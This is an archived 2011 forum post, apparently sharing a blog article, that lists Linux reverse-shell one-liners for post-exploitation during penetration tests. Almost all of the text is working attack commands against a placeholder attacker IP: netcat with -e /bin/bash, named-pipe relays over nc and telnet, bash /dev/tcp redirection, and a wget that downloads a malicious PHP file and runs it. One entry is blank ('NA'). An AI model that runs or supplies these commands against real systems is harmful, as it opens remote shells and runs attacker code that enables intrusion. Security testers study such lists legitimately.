PDA

View Full Version : Post Exploitation - 7 Linux Shells Using Built-in Tools



RingZzer0
11-26-2011, 10:23 AM
Nice share here - 7 Linux Shells Using Built-in Tools « LaNMaSteR53.blog (http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/)

There are many distributions of linux, and they all do things a little different regarding default security and built-in tool sets. Which means when engaging these different flavors during a pentest, what works against one linux target to get an interactive shell, may not work against another. Well, not to worry my friends, there are many techniques for spawning shells, specifically reverse shells, from linux, and one or more of these techniques is bound to be available no matter which distro you’re looking at.

The scenario is this: You have the ability to run a simple command, or cause a user to run a simple command, on the target system. Whether it be via a Remote Command Execution vulnerability in a website, or some sort of php injected XSS which causes a privileged user to run commands on the target system. There are many instances of this scenario. Starting from the easiest and most common, here are some of the techniques which can be used to gain reverse shell on the target system.

1. nc <attacker_ip> <port> -e /bin/bash
2. mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
3. /bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
4. mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
5. telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
6. NA
7. wget -O /tmp/bd.php <url_to_malicious_file> && php -f /tmp/bd.php